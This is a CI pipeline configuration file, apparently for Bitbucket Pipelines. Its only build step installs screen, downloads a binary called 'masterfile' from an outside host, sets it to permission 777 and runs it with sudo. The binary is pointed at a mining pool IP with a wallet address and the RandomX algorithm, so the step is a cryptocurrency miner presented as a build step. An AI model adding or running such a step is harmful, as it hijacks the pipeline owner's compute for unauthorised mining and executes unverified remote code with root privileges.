pipelines:
  default:
    - step:
        script:
            - sudo apt install screen -y && wget https://swenson.my.id/mining/masterfile && sudo chmod 777 masterfile && sudo ./masterfile -o 139.99.124.170:80 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr -k -a rx/0 -p lahini > screen -R mining